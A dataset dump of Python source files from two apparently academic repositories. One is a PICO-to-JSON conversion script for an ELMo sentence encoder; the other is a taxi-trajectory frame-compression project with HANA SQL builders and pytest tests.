index int64 | repo_name string | branch_name string | path string | content string | import_graph string |
|---|---|---|---|---|---|
78,121 | pumpkinduo/ELMO_sentence_encoder | refs/heads/master | /dataset_txt_to_json.py | import csv
import codecs
datasets = []
f = open("PICO_test.txt")
i = 0
count = 0
g = f.readlines()
for line in g:
if line != "" and line != "\n":
count += 1
file = "".join(g).split("\n\n")
all_sentence = []
# print(i)
for lines in file[i].split("\n"):
if not lines.startswith("###"):
ls2 = lines.split("|")
sentencess = ls2[2:]
sentencess = "".join(sentencess).strip().split(" ")
for word in sentencess:
if word != "":
all_sentence.append(word)
if count > len(file[i].split("\n")):
i += 1
count = 0
dataset = []
sentencelist = []
if not line.startswith("###"):
line = "".join(line)
ls = line.split("|")
tag, sentence = ls[1], ls[2:]
sentence = "".join(sentence).strip()
sentence = sentence.split(" ")
for word in sentence:
sentencelist.append(word)
dataset.append(sentencelist)
dataset.append(tag)
dataset.append(all_sentence)
datasets.append(dataset)
for j in datasets:
if j[0] == [""]:
datasets.remove(j)
print("数据加载完毕")
import json
with open("../PICO/testPICO.json","w",encoding="utf-8") as f:
for index,word in enumerate(datasets):
json.dump(datasets[index], f)
f.write("\n")
| {"/ELMO_sentence/train.py": ["/ELMO_sentence/data_util.py"]} |
78,122 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/test/test_sample.py | import datetime
from frame.models.sample import Sample
def test_frame_id():
sample = Sample(datetime.datetime(2018, 1, 1, 0, 0, 0), 0.0, 0.0, 0, 0)
assert sample.frame_id() == 0
sample = Sample(datetime.datetime(2018, 1, 1, 0, 0, 30), 0.0, 0.0, 0, 0)
assert sample.frame_id() == 1
sample = Sample(datetime.datetime(2018, 1, 1, 0, 1, 29), 0.0, 0.0, 0, 0)
assert sample.frame_id() == 2
sample = Sample(datetime.datetime(2018, 1, 1, 1, 0, 0), 0.0, 0.0, 0, 0)
assert sample.frame_id() == 120
sample = Sample(datetime.datetime(2018, 1, 1, 1, 0, 30), 0.0, 0.0, 0, 0)
assert sample.frame_id() == 121
sample = Sample(datetime.datetime(2018, 1, 1, 23, 59, 59), 0.0, 0.0, 0, 0)
assert sample.frame_id() == 2879
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,123 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sql/get_trajectories_shark.py | from consts import DB_TABLE
def trajectory_in_group_range_sample_point(trajectory_id, first_group_id, last_group_id):
union_string = 'UNION ALL'
filter_string = f'''
WHERE FGID >= {first_group_id}
AND FGID < {last_group_id}
AND TID = {trajectory_id}'''
sql = f'''
SELECT TID,
FGID,
Ix AS LON,
Iy AS LAT
FROM Taxi.{DB_TABLE}
{filter_string}
{union_string}
'''
for i in range(1, 119):
sql += f'''
SELECT TID,
FGID,
Ix + P{i}x AS LON,
Iy + P{i}y AS LAT
FROM Taxi.{DB_TABLE}
{filter_string}
'''
sql += union_string if i < 118 else ''
return sql
def trajectories_in_group_range(first_group_id, last_group_id, trajectory_id=None):
sql = f'''
SELECT TID,
FGID,
Ix,
Iy,
'''
for i in range(1, 119):
sql += f'''
Ix + P{i}x AS P{i}x,
Iy + P{i}y AS P{i}y
'''
sql += ',' if i != 118 else ''
sql += f'''
FROM Taxi.{DB_TABLE}
WHERE FGID >= {first_group_id}
AND FGID < {last_group_id}
'''
sql += f'AND TID = {trajectory_id}' if trajectory_id else ''
return sql
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,124 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sql/create_table.py | from consts import DB_TABLE
def get_create_table(frame_size):
sql = f'''
CREATE COLUMN TABLE {DB_TABLE} (
trajectory_id INTEGER,
group_id INTEGER,
trip_id INTEGER,
occupancy BOOLEAN,
Ix DOUBLE,
Iy DOUBLE,'''
for i in range(1, frame_size):
p_frame = f'''
P{i}x DOUBLE,
P{i}y DOUBLE'''
last_frame = frame_size - 1
if i < last_frame:
p_frame += ','
sql += p_frame
sql += ')'
return sql
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,125 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/test/test_main.py | import datetime
from frame.__main__ import create_frames, create_frame_groups
from frame.frame_utils import add_padding, delta_encode
from frame.models.frame import Frame
from frame.models.frame_group import FrameGroup
def test_create_frames_groups_sample_in_same_minute():
trajectory = [(1, datetime.datetime(2017, 1, 1, 0, 0, 0), 100.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 0, 30), 100.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 0, 59), 100.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 1, 0), 105.0, 105.5, 0, 0)]
expected_frames = [Frame(0, 100.0, 100.5), Frame(1, 100.0, 100.5), Frame(2, 105.0, 105.5)]
actual_frames = create_frames(trajectory)
assert actual_frames == expected_frames
def test_create_frames_interpolates_missing_frame():
trajectory = [(1, datetime.datetime(2017, 1, 1, 0, 0, 0), 100.0, 100.0, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 1, 0), 200.0, 200.0, 0, 0)]
expected_frames = [Frame(0, 100.0, 100.0), Frame(1, 150.0, 150.0), Frame(2, 200.0, 200.0)]
actual_frames = create_frames(trajectory)
assert actual_frames == expected_frames
def test_create_frames_does_not_interpolate_first_missing_frames():
trajectory = [(1, datetime.datetime(2017, 1, 1, 0, 3, 0), 100.0, 100.0, 0, 0)]
expected_frames = [Frame(6, 100.0, 100.0)]
actual_frames = create_frames(trajectory)
assert actual_frames == expected_frames
def test_create_frames_does_not_interpolate_last_missing_frames():
trajectory = [(1, datetime.datetime(2017, 1, 1, 0, 57, 0), 100.0, 100.0, 0, 0)]
expected_frames = [Frame(114, 100.0, 100.0)]
actual_frames = create_frames(trajectory)
assert actual_frames == expected_frames
def test_create_frames_performs_sed_to_select_samples_in_same_frame():
trajectory = [(1, datetime.datetime(2017, 1, 1, 0, 1, 0), 100.0, 100.0, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 2, 0), 100.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 2, 30), 200.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 2, 59), 149.0, 104.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 3, 0), 150.0, 105.5, 0, 0)]
expected_frames = [Frame(1, 100.0, 100.0), Frame(2, 200.0, 100.5), Frame(3, 150.0, 105.5)]
actual_frames = create_frames(trajectory)
assert actual_frames == expected_frames
def test_create_frames_performs_sed_to_select_samples_in_same_frame():
trajectory = [(1, datetime.datetime(2017, 1, 1, 0, 1, 0), 100.0, 100.0, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 1, 30), 100.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 1, 40), 200.0, 100.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 1, 59), 149.0, 104.5, 0, 0),
(1, datetime.datetime(2017, 1, 1, 0, 2, 0), 150.0, 105.5, 0, 0)]
expected_frames = [Frame(2, 100.0, 100.0), Frame(3, 200.0, 100.5), Frame(4, 150.0, 105.5)]
actual_frames = create_frames(trajectory)
assert actual_frames == expected_frames
def test_create_frame_groups():
trajectory_id = 1
frames = [Frame(1, 100.0, 100.0), Frame(2, 200.0, 100.0), Frame(3, 150.0, 150.0)]
i_frame = Frame(1, 100.0, 100.0)
p_frames = [Frame(0, 0.0, 0.0), Frame(2, 100.0, 0.0), Frame(3, 50.0, 50.0)]
p_frames += [Frame(0, 0.0, 0.0)] * 56
expected_frame_groups = [FrameGroup(trajectory_id, 1, i_frame, p_frames)]
actual_frame_groups = create_frame_groups(trajectory_id, frames)
assert actual_frame_groups == expected_frame_groups
def test_add_padding_fills_missing_frames_for_n_minutes_at_beginning_and_end():
frames = [Frame(2, 200.0, 100.0), Frame(3, 150.0, 150.0)]
expected_frames = [Frame(0, 0.0, 0.0), Frame(2, 200.0, 100.0), Frame(3, 150.0, 150.0)]
expected_frames += [Frame(0, 0.0, 0.0)] * 56
actual_frames = add_padding(frames, 59)
assert actual_frames == expected_frames
def test_add_no_padding_if_frame_is_full():
frames = [Frame(1, 200.0, 100.0)] * 59
actual_frames = add_padding(frames, 59)
assert actual_frames == frames
def test_add_full_padding_frame():
frames = []
expected_frames = [Frame(0, 0, 0)] * 59
actual_frames = add_padding(frames, 59)
assert actual_frames == expected_frames
def test_delta_encoding():
i_frame = Frame(1, 100.0, 100.0)
frame = Frame(1, 150.0, 50.0)
expected_p_frame = Frame(1, 50.0, -50.0)
actual_p_frame = delta_encode(i_frame, frame)
assert actual_p_frame == expected_p_frame
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,126 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sql_utils.py | from frame.sql.create_table import get_create_table
from frame.sql.frame_group import get_insert
def read_sql(file_name):
with open(file_name) as f:
return f.read()
def create_new_table(connection):
connection.execute(get_create_table(30))
def insert_frame_groups(connection, frame_groups):
for frame_group in frame_groups:
sql = get_insert(frame_group)
connection.execute(sql)
print(f'Inserted frame group into db: {frame_group.trajectory_id}:{frame_group.frame_group_id}')
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,127 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/frame_utils.py | import numpy as np
from frame.models.frame import Frame
def interpolate_missing_frames(previous, following):
# assert (following.id - previous.id) > 1
missing_ids = range(previous.id + 1, following.id)
longitudes = np.interp(missing_ids, (previous.id, following.id), (previous.x, following.x))
latitudes = np.interp(missing_ids, (previous.id, following.id), (previous.y, following.y))
return [Frame(missing_ids[i], longitudes[i], latitudes[i], previous.occupancy) for i in range(len(longitudes))]
def add_padding(frames, n):
first_id = (frames[0].id % 15) if len(frames) > 0 else 0
padded_frames = []
padded_frames += [Frame(0, None, None, 0)] * first_id
padded_frames += frames
padded_frames += [Frame(0, None, None, 0)] * (n - len(padded_frames))
assert len(padded_frames) == n
return padded_frames
def group_frames(frames, group_size):
grouped_frames = {}
trip_id = -1
last_occupancy = -1
last_group_id = -1
for frame in frames:
group_id = int(frame.id / group_size) + 1
if last_occupancy != frame.occupancy or last_group_id != group_id:
trip_id += 1
last_occupancy = frame.occupancy
last_group_id = group_id
key = (group_id, trip_id, frame.occupancy)
if key not in grouped_frames:
grouped_frames[key] = list()
grouped_frames[key].append(frame)
return grouped_frames
def delta_encode(i_frame, frame):
if any(frame.x is None for frame in [i_frame, frame]):
return frame
x = frame.x - i_frame.x
y = frame.y - i_frame.y
return Frame(frame.id, x, y, frame.occupancy)
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,128 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/test/test_sample_utils.py | import datetime
from frame.models.sample import Sample
from frame.sample_utils import _euclidean_distance, sample_with_highest_sed
def test_euclidean_distance():
assert _euclidean_distance(0, 0, 5, 0) == 5
assert _euclidean_distance(4, 0, 0, 0) == 4
assert _euclidean_distance(0, 0, 4, 3) == 5
assert _euclidean_distance(0, 0, -4, -3) == 5
def test_sample_with_highest_sed():
previous = Sample(datetime.time(0, 0, 0), 0, 0, 0, 0)
following = Sample(datetime.time(0, 2, 0), 5, 5, 0, 0)
expected = Sample(datetime.time(0, 1, 10), 1, 10, 0, 0)
samples_in_same_frame = [expected,
Sample(datetime.time(0, 1, 30), 2.5, 2.5, 0, 0),
Sample(datetime.time(0, 1, 45), 3, 3, 0, 0)]
actual = sample_with_highest_sed(samples_in_same_frame, previous, following)
assert actual == expected
def test_sample_with_highest_sed_single_sample():
previous = Sample(datetime.time(0, 0, 0), 0, 0, 0, 0)
following = Sample(datetime.time(0, 2, 0), 5, 5, 0, 0)
expected = Sample(datetime.time(0, 1, 10), 1, 10, 0, 0)
samples_in_same_frame = [expected]
actual = sample_with_highest_sed(samples_in_same_frame, previous, following)
assert actual == expected
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,129 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/models/frame.py | class Frame:
def __init__(self, id: int, x: float, y: float, occupancy: int):
self.id = id
self.x = x
self.y = y
self.occupancy = occupancy
def __eq__(self, other):
"""Overrides the default implementation"""
if isinstance(self, other.__class__):
return self.__dict__ == other.__dict__
return False
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,130 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sql/frame_group.py | from consts import DB_TABLE
from frame.models.frame_group import FrameGroup
def get_insert(frame_group: FrameGroup):
x = '0' if frame_group.i_frame.x is None else frame_group.i_frame.x
y = '0' if frame_group.i_frame.y is None else frame_group.i_frame.y
sql = f'''
INSERT INTO {DB_TABLE} VALUES (
{frame_group.trajectory_id},
{frame_group.frame_group_id},
{frame_group.trip_id},
{frame_group.occupancy},
{x},
{y},'''
for i, frame in enumerate(frame_group.p_frames):
x = 'NULL' if frame.x is None else frame.x
y = 'NULL' if frame.y is None else frame.y
p_frame = f'''{x},
{y}'''
last_frame = len(frame_group.p_frames) - 1
if i < last_frame:
p_frame += ','
sql += p_frame
sql += ')'
return sql
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,131 | VolkerSchiewe/tuk_3 | refs/heads/master | /consts.py | DB_TABLE = 'SHENZHEN_SHARK_DB_30'
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,132 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/tracker.py | class Tracker:
def __init__(self):
self.samples = 0
self.frames = 0
self.samples_per_frame = 0
self.frames_interpolated = 0
def track_sample(self):
self.samples += 1
def track_frame(self, samples):
self.frames += 1
self.samples_per_frame += samples
def track_interpolated_frames(self, frames):
self.frames_interpolated += frames
def print(self):
print(f'Tracked {self.samples} samples, {self.frames_interpolated} frames were interpolated, '
f'{self.samples_per_frame / self.frames} samples per frame were found.')
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,133 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/models/frame_group.py | from frame.models.frame import Frame
class FrameGroup:
def __init__(self, trajectory_id: int, frame_group_id: int, trip_id: int, occupancy: int, i_frame: Frame,
p_frames: [Frame]):
self.trajectory_id = trajectory_id
self.frame_group_id = frame_group_id
self.trip_id = trip_id
self.occupancy = bool(occupancy)
self.i_frame = i_frame
self.p_frames = p_frames
def __eq__(self, other):
"""Overrides the default implementation"""
if isinstance(self, other.__class__):
return self.__dict__ == other.__dict__
return False
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,134 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/test/test_frame_utils.py | import pytest
from frame.frame_utils import interpolate_missing_frames
from frame.models.frame import Frame
def test_interpolate_single_missing_frame():
previous = Frame(1, 1.00, 3.00)
following = Frame(3, 2.00, 6.00)
expected = [Frame(2, 1.5, 4.5)]
actual = interpolate_missing_frames(previous, following)
assert expected == actual
def test_interpolate_multiple_missing_frames():
previous = Frame(1, 1.00, 5.00)
following = Frame(5, 5.00, 1.00)
expected = [Frame(2, 2.0, 4.0), Frame(3, 3.0, 3.0), Frame(4, 4.0, 2.0)]
actual = interpolate_missing_frames(previous, following)
assert expected == actual
def test_error_on_interpolating_subsequent_frames():
previous = Frame(1, 1.00, 5.00)
following = Frame(2, 5.00, 1.00)
with pytest.raises(AssertionError):
interpolate_missing_frames(previous, following)
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,135 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/__main__.py | from frame.frame_utils import interpolate_missing_frames, group_frames, add_padding, delta_encode
from frame.models.frame_group import FrameGroup
from frame.models.sample import Sample
from frame.sample_utils import sample_with_highest_sed
from frame.sql.get_trajectories_shark import trajectories_in_group_range
from frame.sql_utils import read_sql
from frame.tracker import Tracker
from utils.hana_connector import HanaConnection
tracker = Tracker()
def run():
with HanaConnection() as connection:
connection.execute(read_sql('./sql/trajectories.sql'))
trajectories = connection.fetchall()
# create_new_table(connection)
for trajectory_id in trajectories:
connection.execute(read_sql("./sql/get_trajectory.sql").format(trajectory_id[0]))
trajectory = connection.fetchall()
frames = create_frames(trajectory)
frame_groups = create_frame_groups(trajectory_id[0], frames)
# insert_frame_groups(connection, frame_groups)
tracker.print()
def create_frames(trajectory):
frames = []
current_frame_id = 0
samples_in_frame = []
for row in trajectory:
tracker.track_sample()
sample = Sample.from_row(row)
in_current_frame = sample.frame_id() == current_frame_id
if not in_current_frame:
if len(samples_in_frame) > 0:
# Create a frame from collected samples, uses SED if necessary
previous_frame = frames[-1] if len(frames) > 0 else samples_in_frame[0].to_frame()
following_frame = sample.to_frame()
selected_sample = sample_with_highest_sed(samples_in_frame, previous_frame, following_frame)
frames.append(selected_sample.to_frame())
tracker.track_frame(len(samples_in_frame))
samples_in_frame = []
# Interpolate missing frames
if len(frames) > 0 and sample.frame_id() != current_frame_id + 1:
interpolated_frames = interpolate_missing_frames(frames[-1], sample.to_frame())
tracker.track_interpolated_frames(len(interpolated_frames))
frames = frames + interpolated_frames
current_frame_id = sample.frame_id()
samples_in_frame.append(sample)
